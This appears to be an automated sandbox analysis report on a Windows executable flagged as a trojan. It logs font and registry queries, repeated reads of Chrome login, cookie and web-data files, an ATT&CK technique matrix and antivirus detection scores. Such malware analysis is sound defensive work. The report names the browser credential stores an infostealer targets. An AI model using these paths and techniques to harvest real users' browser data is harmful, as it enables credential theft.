Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040202A cpuid 3_2_0040202A
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Native API		Path Interception11
Process Injection		1
Masquerading		1
OS Credential Dumping		121
Security Software Discovery		Remote Services1
Screen Capture		Exfiltration Over Other Network Medium2
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools		1
Input Capture		121
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Input Capture		Exfiltration Over Bluetooth1
Non-Standard Port		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)121
Virtualization/Sandbox Evasion		Security Account Manager1
Application Window Discovery		SMB/Windows Admin Shares1
Archive Collected Data		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS1
File and Directory Discovery		Distributed Component Object Model1
Data from Local System		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets23
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common12
Software Packing		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Timestomp		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe38%ReversingLabsByteCode-MSIL.Trojan.Heracles
file.exe43%VirustotalBrowse
file.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/H0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.carterandcone.com0%URL Reputationsafe
http://www.fontbureau.comceTF0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/-cz0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/~0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://www.carterandcone.comMic0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/S0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
http://en.wikip0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/?0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/Sue0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.monotype.T0%Avira URL Cloudsafe
http://www.founder.com.cn/cn/0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/t-i0%Avira URL Cloudsafe
http://www.fontbureau.comoitu0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/&0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.fontbureau.como0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/l0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/t-i0%VirustotalBrowse
http://www.jiyu-kobo.co.jp/Y0-f0%Avira URL Cloudsafe
http://www.carterandcone.comsio0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/WebdA0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/Y0-f0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
